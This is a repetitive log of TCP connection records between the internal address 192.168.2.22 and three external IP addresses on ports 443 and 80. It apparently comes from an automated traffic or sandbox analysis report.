                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
